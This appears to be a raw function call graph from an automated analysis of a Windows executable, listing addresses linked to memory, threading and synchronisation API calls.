29046->29049 29114 7ff773c74120 7 API calls 29046->29114 29122 7ff773c8d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29047->29122 29055 7ff773c7e408 29049->29055 29105 7ff773c60e30 29049->29105 29052 7ff773c7e378 29052->29047 29053 7ff773c7e380 29052->29053 29115 7ff773c77a30 29053->29115 29055->29001 29057 7ff773c823ad 29056->29057 29059 7ff773c823d7 29056->29059 29058 7ff773c60e30 10 API calls 29057->29058 29058->29059 29059->29004 29061 7ff773c7a37a 29060->29061 29062 7ff773c7a33f 29060->29062 29134 7ff773c66ee0 QueryPerformanceCounter 29061->29134 29063 7ff773c60130 4 API calls 29062->29063 29063->29061 29065 7ff773c7a3cb 29135 7ff773c7c0c0 8 API calls ISource 29065->29135 29067 7ff773c7a3d0 29068 7ff773c77e30 29067->29068 29069 7ff773c77e41 29068->29069 29074 7ff773c77f54 29068->29074 29070 7ff773c60130 4 API calls 29069->29070 29071 7ff773c77e5c 29070->29071 29072 7ff773c77eb4 29071->29072 29076 7ff773c60130 4 API calls 29071->29076 29073 7ff773c77f04 29072->29073 29075 7ff773c60130 4 API calls 29072->29075 29073->29074 29077 7ff773c60130 4 API calls 29073->29077 29074->29011 29075->29072 29076->29071 29077->29073 29079 7ff773c7999b 29078->29079 29083 7ff773c799cf 29079->29083 29136 7ff773c61630 QueryPerformanceCounter 29079->29136 29137 7ff773c619f0 WaitForSingleObject 29083->29137 29088->28989 29089->28992 29090->29000 29092 7ff773c601dc 29091->29092 29093 7ff773c6016b 29091->29093 29092->29006 29093->29092 29096 7ff773c601a4 29093->29096 29138 7ff773c5fe50 4 API calls 2 library calls 29093->29138 29096->29092 29139 7ff773c601f0 malloc RtlPcToFileHeader RaiseException _swprintf_c_l 29096->29139 29097->29010 29098->29019 29099->28991 29100->29031 29101->29034 29102->29034 29103->29039 29104->29039 29106 7ff773c60e67 GetCurrentProcess 29105->29106 29107 7ff773c60f1f GlobalMemoryStatusEx 29105->29107 29108 7ff773c60e80 29106->29108 29110 7ff773c60e88 29107->29110 29108->29107 29108->29110 29123 7ff773cbacf0 8 API calls 2 library calls 29110->29123 29111 7ff773c60ff8 29111->29055 29112->29044 29113->29046 29114->29052 29124 7ff773c92480 29115->29124 29117 7ff773c77a69 _swprintf_c_l 29118 7ff773c77b69 29117->29118 29132 7ff773c61770 VirtualFree 29117->29132 29118->29049 29120 7ff773c77b2e 29120->29118 29121 7ff773c77b3c EnterCriticalSection LeaveCriticalSection 29120->29121 29121->29118 29122->29049 29123->29111 29125 7ff773c9249a 29124->29125 29127 7ff773c924a3 29125->29127 29133 7ff773c61770 VirtualFree 29125->29133 29128 7ff773c924f3 29127->29128 29129 7ff773c924bd EnterCriticalSection 29127->29129 29128->29117 29130 7ff773c924e0 29129->29130 29131 7ff773c924e7 LeaveCriticalSection 29129->29131 29130->29131 29131->29128 29132->29120 29133->29127 29134->29065 29135->29067 29136->29083 29138->29096 29139->29092 30169 7ff773c6dcb5 6 API calls 30194 7ff773c66fb0 WaitForSingleObject 29431 7ff773c518b2 29432 7ff773d07360 29431->29432 29434 7ff773c518c8 29431->29434 29432->29434 29435 7ff773d0d620 85 API calls 29432->29435 29435->29434 30231 7ff773c682b0 SetEvent SleepEx SwitchToThread SwitchToThread 30232 7ff773ce6aa0 98 API calls 29503 7ff773c556a0 29509 7ff773c52ce0 29503->29509 29505 7ff773c556b2 29506 7ff773c556ee SetEvent 29505->29506 29515 7ff773d03840 29506->29515 29510 7ff773c52d06 29509->29510 29514 7ff773c52d24 29510->29514 29522 7ff773c5b4e0 FlsGetValue 29510->29522 29512 7ff773c52d1c 29513 7ff773c54930 6 API calls 29512->29513 29513->29514 29514->29505 29525 7ff773c554e0 29515->29525 29517 7ff773d03861 29541 7ff773cf27c0 29517->29541 29520 7ff773d03866 29546 7ff773c55800 WaitForSingleObjectEx 29520->29546 29547 7ff773c557d0 SetEvent 29520->29547 29523 7ff773c5b508 FlsSetValue 29522->29523 29524 7ff773c5b4fa RaiseFailFastException 29522->29524 29524->29523 29526 7ff773c55548 29525->29526 29527 7ff773c5550f 29525->29527 29526->29517 29527->29526 29528 7ff773c555df 29527->29528 29531 7ff773c555c6 29527->29531 29536 7ff773c555a7 29527->29536 29537 7ff773c55588 29527->29537 29529 7ff773c555e6 29528->29529 29530 7ff773c555ff 29528->29530 29548 7ff773c5b980 GetStdHandle WriteFile 29529->29548 29534 7ff773c5562f 29530->29534 29549 7ff773c55370 GetLastError SetLastError 29530->29549 29532 7ff773c52ce0 9 API calls 29531->29532 29532->29528 29534->29517 29535 7ff773c555f2 RaiseFailFastException 29535->29530 29536->29531 29540 7ff773c555b9 RaiseFailFastException 29536->29540 29539 7ff773c55590 Sleep 29537->29539 29539->29536 29539->29539 29540->29531 29550 7ff773cf2890 29541->29550 29545 7ff773cf27d4 29545->29520 29546->29520 29547->29520 29548->29535 29551 7ff773c517fc 85 API calls 29550->29551 29553 7ff773cf28af 29551->29553 29552 7ff773cf27cf 29567 7ff773c517fc 29552->29567 29553->29552 29554 7ff773cf28db CoInitializeEx 29553->29554 29555 7ff773cf28f2 29554->29555 29556 7ff773cf2900 29555->29556 29557 7ff773cf28f6 29555->29557 29556->29552 29571 7ff773cf2970 85 API calls 29556->29571 29557->29552 29558 7ff773cf294a 29557->29558 29572 7ff773c51fc0 71 API calls 29557->29572 29573 7ff773c51fc0 71 API calls 29558->29573 29562 7ff773cf2937 29564 7ff773c52540 26 API calls 29562->29564 29563 7ff773cf2956 29565 7ff773c52540 26 API calls 29563->29565 29564->29558 29566 7ff773cf2969 29565->29566 29568 7ff773c51812 29567->29568 29568->29545 29570 7ff773d0736d 29568->29570 29574 7ff773d0d620 85 API calls 29568->29574 29570->29545 29571->29552 29572->29562 29573->29563 29574->29570 30198 7ff773c53fa0 28 API calls _swprintf_c_l 30199 7ff773c6a7a0 SleepEx SwitchToThread SwitchToThread 30236 7ff773c932d0 16 API calls 29575 7ff773d030d0 29576 7ff773d030e1 29575->29576 29577 7ff773d030ea 29575->29577 29578 7ff773d03105 29577->29578 29580 7ff773d03050 29577->29580 29581 7ff773d03069 29580->29581 29584 7ff773d03160 29581->29584 29583 7ff773d03079 29583->29578 29585 7ff773d03177 29584->29585 29586 7ff773d031ea 29584->29586 29589 7ff773d03220 26 API calls 29585->29589 29586->29583 29588 7ff773d0318b 29588->29583 29589->29588 29617 7ff773c608d0 29618 7ff773c608ea 29617->29618 29619 7ff773c608f5 29617->29619 29620 7ff773c60922 VirtualAlloc 29619->29620 29625 7ff773c6096e 29619->29625 29621 7ff773c60955 29620->29621 29620->29625 29626 7ff773cbac48 29621->29626 29624 7ff773c609c1 VirtualFree 29624->29625 29629 7ff773cbb610 29626->29629 29630 7ff773cbb62a malloc 29629->29630 29631 7ff773c60966 29630->29631 29632 7ff773cbb61b 29630->29632 29631->29624 29631->29625 29632->29630 29633 7ff773cbb63a 29632->29633 29634 7ff773cbb645 29633->29634 29638 7ff773cbb924 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 29633->29638 29639 7ff773cbb944 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 29634->29639 29637 7ff773cbb64b 29639->29637 30172 7ff773c680d0 15 API calls 30239 7ff773c892ce 63 API calls 2 library calls 30274 7ff773c899c3 52 API calls _swprintf_c_l 30241 7ff773c54ec3 25 API calls 30117 7ff773c6dfbf 30120 7ff773c90720 30117->30120 30125 7ff773c6adf0 30120->30125 30123 7ff773c90758 30124 7ff773c6df97 30123->30124 30136 7ff773c6b250 30123->30136 30126 7ff773c6ae39 30125->30126 30134 7ff773c6af10 30126->30134 30149 7ff773c90570 SwitchToThread SwitchToThread SwitchToThread SwitchToThread 30126->30149 30129 7ff773c6b122 30130 7ff773c6b1e9 30129->30130 30131 7ff773c6b1a0 30129->30131 30152 7ff773c6b750 VirtualAlloc VirtualUnlock DebugBreak _swprintf_c_l 30130->30152 30151 7ff773c729c0 6 API calls _swprintf_c_l 30131->30151 30134->30123 30135 7ff773c6af49 _swprintf_c_l 30135->30129 30150 7ff773c83410 VirtualAlloc VirtualUnlock _swprintf_c_l 30135->30150 30138 7ff773c6b2d8 30136->30138 30137 7ff773c6b2dd 30145 7ff773c6b46d 30137->30145 30148 7ff773c6b405 30137->30148 30153 7ff773c90570 SwitchToThread SwitchToThread SwitchToThread SwitchToThread 30137->30153 30138->30137 30139 7ff773c7f900 11 API calls 30138->30139 30138->30145 30139->30137 30141 7ff773c6b477 30156 7ff773c6b750 VirtualAlloc VirtualUnlock DebugBreak _swprintf_c_l 30141->30156 30142 7ff773c6b432 30155 7ff773c729c0 6 API calls _swprintf_c_l 30142->30155 30143 7ff773c6b3da 30143->30148 30154 7ff773c83410 VirtualAlloc VirtualUnlock _swprintf_c_l 30143->30154 30145->30123 30148->30141 30148->30142 30149->30135 30150->30129 30151->30134 30152->30134 30153->30143 30154->30148 30155->30145 30156->30145 28978 7ff773c7d16a 120 API calls _swprintf_c_l 30243 7ff773d0aa80 86 API calls 30202 7ff773c72770 25 API calls 29436 7ff773c51758 85 API calls 30203 7ff773d15390 71 API calls 30247 7ff773c6d8c7 59 API calls 30248 7ff773c5b260 malloc RtlPcToFileHeader RaiseException ISource _swprintf_c_l 30279 7ff773c69d60 34 API calls 30280 7ff773c7498e 10 API calls 30204 7ff773ce7f90 13 API calls 29590 7ff773d0a660 29591 7ff773d0a66d 29590->29591 29598 7ff773d0a67b 29591->29598 29599 7ff773cdfe10 85 API calls 29591->29599 30206 7ff773d0ab60 87 API calls 30208 7ff773c5bb90 14 API calls 30209 7ff773c84390 14 API calls 2 library calls 30210 7ff773d11b70 88 API calls 30284 7ff773c63580 24 API calls _swprintf_c_l 30252 7ff773c6a280 ResetEvent 29140 7ff773d0ad40 29151 7ff773d0ad94 29140->29151 29142 7ff773d0ae21 29169 7ff773d17ba0 86 API calls 29142->29169 29143 7ff773c51fc0 71 API calls 29143->29151 29144 7ff773d0aebb 29145 7ff773d0b2f4 29144->29145 29147 7ff773d0b2db 29144->29147 29170 7ff773d17ba0 86 API calls 29147->29170 29150 7ff773c52540 26 API calls 29150->29151 29151->29142 29151->29143 29151->29144 29151->29150 29152 7ff773d12ed0 86 API calls 29151->29152 29153 7ff773d17940 29151->29153 29152->29151 29154 7ff773d17967 29153->29154 29155 7ff773d17b4f 29153->29155 29154->29155 29156 7ff773d17af5 29154->29156 29157 7ff773d179ba 29154->29157 29159 7ff773d17ac7 29154->29159 29194 7ff773cf1440 85 API calls 29154->29194 29203 7ff773d0f9a0 85 API calls 29155->29203 29156->29155 29158 7ff773d17af9 29156->29158 29156->29159 29157->29151 29158->29151 29160 7ff773d17b3e 29159->29160 29161 7ff773d17b21 29159->29161 29167 7ff773d17ad3 29159->29167 29195 7ff773c520e0 29160->29195 29171 7ff773d270f0 29161->29171 29164 7ff773d17b2a 29164->29151 29166 7ff773d17b81 29167->29151 29169->29151 29170->29145 29172 7ff773d27189 29171->29172 29173 7ff773d27124 29171->29173 29208 7ff773c51fc0 71 API calls 29172->29208 29204 7ff773c53a20 29173->29204 29175 7ff773d27195 29209 7ff773c52540 29175->29209 29178 7ff773d27164 29180 7ff773d27174 29178->29180 29215 7ff773c51fc0 71 API calls 29178->29215 29180->29164 29181 7ff773d271b4 29182 7ff773c52540 26 API calls 29181->29182 29183 7ff773d271c7 29182->29183 29184 7ff773d271e1 29183->29184 29185 7ff773d27254 29183->29185 29187 7ff773d271e9 29184->29187 29188 7ff773d2720d 29184->29188 29216 7ff773cdfc50 85 API calls 29185->29216 29189 7ff773c520e0 85 API calls 29187->29189 29191 7ff773c520e0 85 API calls 29188->29191 29192 7ff773d27221 29188->29192 29190 7ff773d271f8 29189->29190 29190->29164 29191->29192 29192->29164 29196 7ff773c520e9 29195->29196 29197 7ff773c5213b 29195->29197 29198 7ff773c5212e 29196->29198 29315 7ff773c5c700 29196->29315 29200 7ff773c5218c 29197->29200 29201 7ff773c52540 26 API calls 29197->29201 29198->29164 29200->29164 29202 7ff773d03d80 29201->29202 29203->29166 29205 7ff773c53a6e 29204->29205 29217 7ff773c5bf90 29205->29217 29207 7ff773c53a7e 29207->29178 29208->29175 29210 7ff773c525fb 29209->29210 29266 7ff773d03e60 29210->29266 29215->29181 29218 7ff773c5bfb5 29217->29218 29219 7ff773c5c03b 29218->29219 29221 7ff773c674ab 29218->29221 29219->29207 29222 7ff773c674ec 29221->29222 29223 7ff773c67516 29221->29223 29225 7ff773c674f5 DebugBreak 29222->29225 29226 7ff773c674fa 29222->29226 29229 7ff773c6d150 29223->29229 29225->29226 29226->29219 29234 7ff773c6d182 29229->29234 29232 7ff773c86690 GetTickCount64 29232->29234 29234->29232 29237 7ff773c67539 29234->29237 29238 7ff773c73910 39 API calls 29234->29238 29240 7ff773c6de60 29234->29240 29249 7ff773c92520 29234->29249 29259 7ff773c925f0 WaitForSingleObject 29234->29259 29260 7ff773c7adc0 SleepEx SwitchToThread SwitchToThread 29234->29260 29261 7ff773c6d810 56 API calls 29234->29261 29237->29226 29239 7ff773c6a000 SleepEx SwitchToThread DebugBreak ISource 29237->29239 29238->29234 29239->29226 29241 7ff773c6de9c 29240->29241 29248 7ff773c6df48 29240->29248 29242 7ff773c6df09 29241->29242 29243 7ff773c6df5a 29241->29243 29245 7ff773c6df18 SwitchToThread 29242->29245 29243->29248 29263 7ff773c67060 WaitForSingleObject 29243->29263 29246 7ff773c6df26 29245->29246 29246->29248 29262 7ff773c7adc0 SleepEx SwitchToThread SwitchToThread 29246->29262 29248->29234 29250 7ff773c92540 29249->29250 29251 7ff773c925da 29249->29251 29252 7ff773c60e30 10 API calls 29250->29252 29251->29234 29253 7ff773c92567 29252->29253 29254 7ff773c925ca 29253->29254 29264 7ff773c67060 WaitForSingleObject 29253->29264 29254->29234 29256 7ff773c9259e 29258 7ff773c925b1 29256->29258 29265 7ff773c7adc0 SleepEx SwitchToThread SwitchToThread 29256->29265 29258->29234 29259->29234 29260->29234 29261->29234 29262->29248 29263->29246 29264->29256 29265->29258 29267 7ff773d03e72 29266->29267 29270 7ff773d03f20 29267->29270 29269 7ff773d03eab 29283 7ff773c57220 29270->29283 29272 7ff773d04048 29303 7ff773c539d0 29272->29303 29274 7ff773d0401a 29274->29272 29308 7ff773d03ac0 9 API calls 29274->29308 29277 7ff773c57220 10 API calls 29281 7ff773d04076 29277->29281 29278 7ff773d03f8e 29278->29274 29307 7ff773c57350 16 API calls 29278->29307 29280 7ff773d040bf 29280->29269 29281->29280 29309 7ff773c57350 16 API calls 29281->29309 29284 7ff773c57262 29283->29284 29285 7ff773c572a7 29284->29285 29286 7ff773c57267 29284->29286 29288 7ff773c60130 4 API calls 29285->29288 29289 7ff773c572c1 29285->29289 29287 7ff773c57281 29286->29287 29290 7ff773c60130 4 API calls 29286->29290 29310 7ff773c566b0 8 API calls _swprintf_c_l 29287->29310 29288->29289 29291 7ff773c572dd 29289->29291 29292 7ff773c572f2 29289->29292 29290->29287 29312 7ff773c56e60 RaiseFailFastException RaiseFailFastException 29291->29312 29313 7ff773c56e60 RaiseFailFastException RaiseFailFastException 29292->29313 29294 7ff773c5729d 29311 7ff773c56e60 RaiseFailFastException RaiseFailFastException 29294->29311 29298 7ff773c572e9 29299 7ff773c572a5 29298->29299 29300 7ff773c60130 4 API calls 29298->29300 29301 7ff773c57329 29299->29301 29314 7ff773c56020 RaiseFailFastException RaiseFailFastException 29299->29314 29300->29299 29301->29278 29304 7ff773c539f6 29303->29304 29305 7ff773c53a07 29304->29305 29306 7ff773c539fa RaiseFailFastException 29304->29306 29305->29277 29306->29305 29307->29278 29308->29272 29309->29281 29310->29294 29311->29299 29312->29298 29313->29298 29314->29301 29316 7ff773c5c746 29315->29316 29317 7ff773c5c786 29316->29317 29318 7ff773c674ab 69 API calls 29316->29318 29320 7ff773c6759b 29316->29320 29317->29197 29318->29317 29321 7ff773c675bc 29320->29321 29322 7ff773c675ce 29321->29322 29341 7ff773c73910 39 API calls 29321->29341 29323 7ff773c67625 29322->29323 29325 7ff773c676a7 29322->29325 29327 7ff773c675fe GetTickCount64 29322->29327 29326 7ff773c67637 29323->29326 29342 7ff773c73910 39 API calls 29323->29342 29334 7ff773c67570 29325->29334 29343 7ff773c6d810 56 API calls 29325->29343 29330 7ff773c92520 14 API calls 29326->29330 29327->29323 29338 7ff773c67612 29327->29338 29332 7ff773c67649 29330->29332 29331 7ff773c676e3 29331->29334 29335 7ff773c67709 29331->29335 29339 7ff773c674fa 29331->29339 29332->29325 29332->29334 29336 7ff773c67683 GetTickCount64 29332->29336 29340 7ff773c925f0 WaitForSingleObject 29334->29340 29335->29339 29344 7ff773c6a000 SleepEx SwitchToThread DebugBreak ISource 29335->29344 29336->29325 29336->29338 29338->29325 29339->29317 29340->29334 29341->29322 29342->29326 29343->29331 29344->29339 29345 7ff773c7d233 29346 7ff773c7d23d 29345->29346 29385 7ff773c73b10 29346->29385 29349 7ff773c7d2bd 29409 7ff773c61630 QueryPerformanceCounter 29349->29409 29350 7ff773c7d3f2 29355 7ff773c7d2c9 29350->29355 29410 7ff773c76190 10 API calls 29350->29410 29353 7ff773c7d66a 29411 7ff773c73910 39 API calls 29353->29411 29354 7ff773c7d675 29358 7ff773c7d673 29354->29358 29412 7ff773c61670 ResetEvent 29354->29412 29355->29353 29355->29354 29355->29358 29357 7ff773c77e30 4 API calls 29359 7ff773c7d746 29357->29359 29358->29357 29358->29358 29389 7ff773c920b0 29359->29389 29364 7ff773c7d909 29371 7ff773c7d95f _swprintf_c_l 29364->29371 29419 7ff773c91200 28 API calls _swprintf_c_l 29364->29419 29365 7ff773c7da41 29397 7ff773c78830 29365->29397 29367 7ff773c7d8ff 29415 7ff773c5c650 29367->29415 29370 7ff773c7dcf1 29372 7ff773c7dda5 29370->29372 29374 7ff773c7a330 13 API calls 29370->29374 29371->29365 29371->29370 29420 7ff773c8d0e0 EnterCriticalSection LeaveCriticalSection _swprintf_c_l 29371->29420 29374->29372 29375 7ff773c7d883 SwitchToThread 29379 7ff773c7d74b 29375->29379 29376 7ff773c7d8af SwitchToThread 29376->29379 29379->29364 29379->29367 29379->29371 29379->29375 29379->29376 29380 7ff773c7d877 SwitchToThread 29379->29380 29413 7ff773c61690 SleepEx 29379->29413 29414 7ff773c925f0 WaitForSingleObject 29379->29414 29380->29379 29382 7ff773c7da4d 29421 7ff773c61630 QueryPerformanceCounter 29382->29421 29383 7ff773c7dbad 29422 7ff773c79a50 15 API calls 2 library calls 29383->29422 29386 7ff773c73b8b 29385->29386 29388 7ff773c73b1d 29385->29388 29386->29349 29386->29350 29387 7ff773c73b6e DebugBreak 29387->29388 29388->29386 29388->29387 29392 7ff773c920b9 29389->29392 29390 7ff773c9224d 29390->29379 29391 7ff773c92137 DebugBreak 29393 7ff773c92146 29391->29393 29392->29390 29392->29391 29392->29393 29394 7ff773c921b7 DebugBreak 29393->29394 29396 7ff773c921c6 29393->29396 29394->29396 29395 7ff773c9223a DebugBreak 29395->29390 29396->29390 29396->29395 29398 7ff773c7885a 29397->29398 29399 7ff773c78888 29398->29399 29403 7ff773c78a76 29398->29403 29400 7ff773c77a30 5 API calls 29399->29400 29404 7ff773c7891b 29399->29404 29400->29399 29402 7ff773c79954 29402->29382 29408 7ff773c78a71 29403->29408 29423 7ff773c77be0 29403->29423 29406 7ff773c789e5 EnterCriticalSection LeaveCriticalSection 29404->29406 29404->29408 29428 7ff773c61770 VirtualFree 29404->29428 29406->29404 29429 7ff773cbacf0 8 API calls 2 library calls 29408->29429 29409->29355 29410->29350 29411->29358 29413->29379 29414->29379 29416 7ff773c5c65d 29415->29416 29430 7ff773c53260 15 API calls 29416->29430 29418 7ff773c5c6c4 29419->29371 29420->29371 29421->29383 29422->29370 29424 7ff773c77bed 29423->29424 29425 7ff773c77bf4 29423->29425 29424->29408 29426 7ff773c77a30 5 API calls 29425->29426 29427 7ff773c77c69 29425->29427 29426->29425 29427->29408 29428->29404 29429->29402 29430->29418 30179 7ff773c66830 QueryPerformanceCounter 30180 7ff773c57430 GetCurrentProcess FlushInstructionCache VirtualProtect 30255 7ff773c54230 8 API calls 30286 7ff773c53930 17 API calls 30181 7ff773cbac2c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 29437 7ff773c9031b 29438 7ff773c9032c 29437->29438 29439 7ff773c9035a 29438->29439 29441 7ff773c68808 29438->29441 29442 7ff773c6880d 29441->29442 29461 7ff773c7ad30 29442->29461 29445 7ff773c6884d 29465 7ff773c61630 QueryPerformanceCounter 29445->29465 29448 7ff773c6886e 29449 7ff773c5c650 15 API calls 29448->29449 29450 7ff773c688be 29449->29450 29466 7ff773c8e8c0 29450->29466 29452 7ff773c689cd 29453 7ff773c7ad30 SwitchToThread 29452->29453 29455 7ff773c68a55 29453->29455 29454 7ff773c688c3 29454->29452 29476 7ff773c61630 QueryPerformanceCounter 29454->29476 29458 7ff773c68a78 29455->29458 29477 7ff773c61680 SetEvent 29455->29477 29478 7ff773c55710 SetEvent 29458->29478 29460 7ff773c68aa9 29460->29439 29462 7ff773c6882f 29461->29462 29464 7ff773c7ad4f 29461->29464 29462->29445 29475 7ff773c61670 ResetEvent 29462->29475 29463 7ff773c7ad91 SwitchToThread 29463->29464 29464->29462 29464->29463 29465->29448 29467 7ff773c8e8d3 29466->29467 29471 7ff773c8e8e1 29466->29471 29468 7ff773c8e9ae 29467->29468 29467->29471 29479 7ff773c7b100 46 API calls 29467->29479 29472 7ff773c8e9b2 29468->29472 29480 7ff773c7bc40 38 API calls 29468->29480 29471->29454 29472->29454 29473 7ff773c8e9d9 29473->29472 29481 7ff773c7f900 29473->29481 29476->29452 29478->29460 29479->29468 29480->29473 29482 7ff773c7f916 29481->29482 29483 7ff773c7f947 29482->29483 29484 7ff773c7f9b0 29482->29484 29485 7ff773c60130 4 API calls 29482->29485 29483->29472 29489 7ff773c92320 29484->29489 29485->29484 29488 7ff773c60130 4 API calls 29488->29483 29490 7ff773c92359 EnterCriticalSection 29489->29490 29491 7ff773c923e5 29489->29491 29493 7ff773c92379 LeaveCriticalSection 29490->29493 29494 7ff773c7f9d9 29491->29494 29500 7ff773c616e0 29491->29500 29493->29491 29494->29483 29494->29488 29495 7ff773c92413 29495->29494 29497 7ff773c92424 EnterCriticalSection 29495->29497 29498 7ff773c92443 29497->29498 29499 7ff773c9244a LeaveCriticalSection 29497->29499 29498->29499 29499->29494 29501 7ff773c616fb VirtualAlloc 29500->29501 29502 7ff773c6171e GetCurrentProcess VirtualAllocExNuma 29500->29502 29501->29495 29502->29495 30184 7ff773c66820 SleepEx SwitchToThread 30215 7ff773c67f20 GetCurrentThreadId malloc RtlPcToFileHeader RaiseException 30257 7ff773c66a20 SleepEx WaitForSingleObject SwitchToThread SwitchToThread SwitchToThread 30287 7ff773c5a520 9 API calls 30216 7ff773c54720 6 API calls 30217 7ff773c93f50 9 API calls 29600 7ff773d0e620 29601 7ff773c554e0 16 API calls 29600->29601 29602 7ff773d0e640 29601->29602 29613 7ff773c54340 malloc RtlPcToFileHeader RaiseException _swprintf_c_l 29602->29613 29604 7ff773d0e648 29614 7ff773d0e7e0 85 API calls 29604->29614 29606 7ff773d0e666 29607 7ff773c520e0 85 API calls 29606->29607 29608 7ff773d0e678 29607->29608 29609 7ff773d0e69b 29608->29609 29615 7ff773d0e990 85 API calls 29608->29615 29616 7ff773d02fa0 85 API calls 29609->29616 29612 7ff773d0e6a8 29613->29604 29614->29606 29615->29608 29616->29612 30260 7ff773c86e53 40 API calls _swprintf_c_l 30186 7ff773c52450 26 API calls 30261 7ff773c55650 GetLastError SetLastError RtlRestoreContext 29640 7ff773c54740 29670 7ff773c5b820 FlsAlloc 29640->29670 29642 7ff773c548e4 29643 7ff773c5474f 29643->29642 29683 7ff773c5b6c0 GetModuleHandleExW 29643->29683 29645 7ff773c54778 29684 7ff773c55ad0 29645->29684 29647 7ff773c54780 29647->29642 29692 7ff773c5cb30 29647->29692 29651 7ff773c547b1 29651->29642 29652 7ff773c547e7 29651->29652 29722 7ff773c5ced0 29651->29722 29654 7ff773c54822 29652->29654 29655 7ff773c5ced0 8 API calls 29652->29655 29656 7ff773c54879 29654->29656 29701 7ff773c60030 29654->29701 29655->29654 29709 7ff773c5c3c0 29656->29709 29659 7ff773c5487e 29659->29642 29725 7ff773c60470 GetEnabledXStateFeatures GetEnabledXStateFeatures 29659->29725 29661 7ff773c54896 29662 7ff773c548aa 29661->29662 29663 7ff773c548c3 29661->29663 29726 7ff773c5b980 GetStdHandle WriteFile 29662->29726 29727 7ff773c5c8a0 29663->29727 29666 7ff773c548b6 RaiseFailFastException 29666->29663 29671 7ff773c5b96e 29670->29671 29672 7ff773c5b840 29670->29672 29671->29643 29729 7ff773c62750 29672->29729 29677 7ff773c5ced0 8 API calls 29678 7ff773c5b872 29677->29678 29679 7ff773c5b89d GetCurrentProcess GetProcessAffinityMask 29678->29679 29681 7ff773c5b894 29678->29681 29682 7ff773c5b908 29678->29682 29679->29681 29680 7ff773c5b8e4 QueryInformationJobObject 29680->29682 29681->29680 29682->29643 29683->29645 29685 7ff773cbac48 _swprintf_c_l 3 API calls 29684->29685 29686 7ff773c55ae5 29685->29686 29687 7ff773c55b24 29686->29687 29904 7ff773c60860 InitializeCriticalSectionEx 29686->29904 29687->29647 29689 7ff773c55af2 29689->29687 29690 7ff773c5c8a0 InitializeCriticalSectionEx 29689->29690 29691 7ff773c55b1d 29690->29691 29691->29647 29693 7ff773c5c8a0 InitializeCriticalSectionEx 29692->29693 29694 7ff773c547a1 29693->29694 29694->29642 29695 7ff773c540a0 29694->29695 29696 7ff773cbac48 _swprintf_c_l 3 API calls 29695->29696 29697 7ff773c540be 29696->29697 29698 7ff773c5415a 29697->29698 29905 7ff773c52e10 4 API calls 2 library calls 29697->29905 29698->29651 29700 7ff773c540f0 ISource 29700->29651 29702 7ff773c6005b 29701->29702 29708 7ff773c60106 29701->29708 29703 7ff773cbac48 _swprintf_c_l 3 API calls 29702->29703 29704 7ff773c6007a 29703->29704 29705 7ff773c5c8a0 InitializeCriticalSectionEx 29704->29705 29706 7ff773c600a5 29705->29706 29707 7ff773c600ee GetSystemTimeAsFileTime 29706->29707 29707->29708 29708->29656 29710 7ff773c5c40c 29709->29710 29713 7ff773c5c406 29709->29713 29711 7ff773c5ced0 8 API calls 29710->29711 29711->29713 29906 7ff773c5c830 29713->29906 29715 7ff773c5c483 29715->29659 29716 7ff773c5c45f 29716->29715 29929 7ff773c55720 29716->29929 29718 7ff773c5c468 29718->29715 29936 7ff773c5daf0 29718->29936 29719 7ff773c5c478 29719->29659 30116 7ff773c5d0e0 8 API calls 29722->30116 29724 7ff773c5cef8 29724->29652 29725->29661 29726->29666 29728 7ff773cba952 InitializeCriticalSectionEx 29727->29728 29875 7ff773c5c0d0 29729->29875 29731 7ff773c6276e 29732 7ff773c5c0d0 8 API calls 29731->29732 29733 7ff773c6279b 29732->29733 29734 7ff773c5c0d0 8 API calls 29733->29734 29735 7ff773c627c3 29734->29735 29736 7ff773c5c0d0 8 API calls 29735->29736 29737 7ff773c627eb 29736->29737 29738 7ff773c5c0d0 8 API calls 29737->29738 29739 7ff773c62818 29738->29739 29740 7ff773c5c0d0 8 API calls 29739->29740 29741 7ff773c62840 29740->29741 29742 7ff773c5c0d0 8 API calls 29741->29742 29743 7ff773c6286d 29742->29743 29744 7ff773c5c0d0 8 API calls 29743->29744 29745 7ff773c62895 29744->29745 29746 7ff773c5c0d0 8 API calls 29745->29746 29747 7ff773c628bd 29746->29747 29748 7ff773c5c0d0 8 API calls 29747->29748 29749 7ff773c628e5 29748->29749 29750 7ff773c5c0d0 8 API calls 29749->29750 29751 7ff773c62912 29750->29751 29752 7ff773c5c0d0 8 API calls 29751->29752 29753 7ff773c6293f 29752->29753 29880 7ff773c5c1a0 29753->29880 29756 7ff773c5c1a0 18 API calls 29757 7ff773c62990 29756->29757 29758 7ff773c5c1a0 18 API calls 29757->29758 29759 7ff773c629b9 29758->29759 29760 7ff773c5c1a0 18 API calls 29759->29760 29761 7ff773c629e2 29760->29761 29762 7ff773c5c1a0 18 API calls 29761->29762 29763 7ff773c62a0b 29762->29763 29764 7ff773c5c1a0 18 API calls 29763->29764 29765 7ff773c62a39 29764->29765 29766 7ff773c5c1a0 18 API calls 29765->29766 29767 7ff773c62a67 29766->29767 29768 7ff773c5c1a0 18 API calls 29767->29768 29769 7ff773c62a90 29768->29769 29770 7ff773c5c1a0 18 API calls 29769->29770 29771 7ff773c62ab9 29770->29771 29772 7ff773c5c1a0 18 API calls 29771->29772 29773 7ff773c62ae2 29772->29773 29774 7ff773c5c1a0 18 API calls 29773->29774 29775 7ff773c62b0b 29774->29775 29776 7ff773c5c1a0 18 API calls 29775->29776 29777 7ff773c62b34 29776->29777 29778 7ff773c5c1a0 18 API calls 29777->29778 29779 7ff773c62b5d 29778->29779 29780 7ff773c5c1a0 18 API calls 29779->29780 29781 7ff773c62b8b 29780->29781 29782 7ff773c5c1a0 18 API calls 29781->29782 29783 7ff773c62bb9 29782->29783 29784 7ff773c5c1a0 18 API calls 29783->29784 29785 7ff773c62be2 29784->29785 29786 7ff773c5c1a0 18 API calls 29785->29786 29787 7ff773c62c0b 29786->29787 29788 7ff773c5c1a0 18 API calls 29787->29788 29789 7ff773c62c34 29788->29789 29790 7ff773c5c1a0 18 API calls 29789->29790 29791 7ff773c62c5d 29790->29791 29792 7ff773c5c1a0 18 API calls 29791->29792 29793 7ff773c62c8b 29792->29793 29794 7ff773c5c1a0 18 API calls 29793->29794 29795 7ff773c62cb9 29794->29795 29796 7ff773c5c1a0 18 API calls 29795->29796 29797 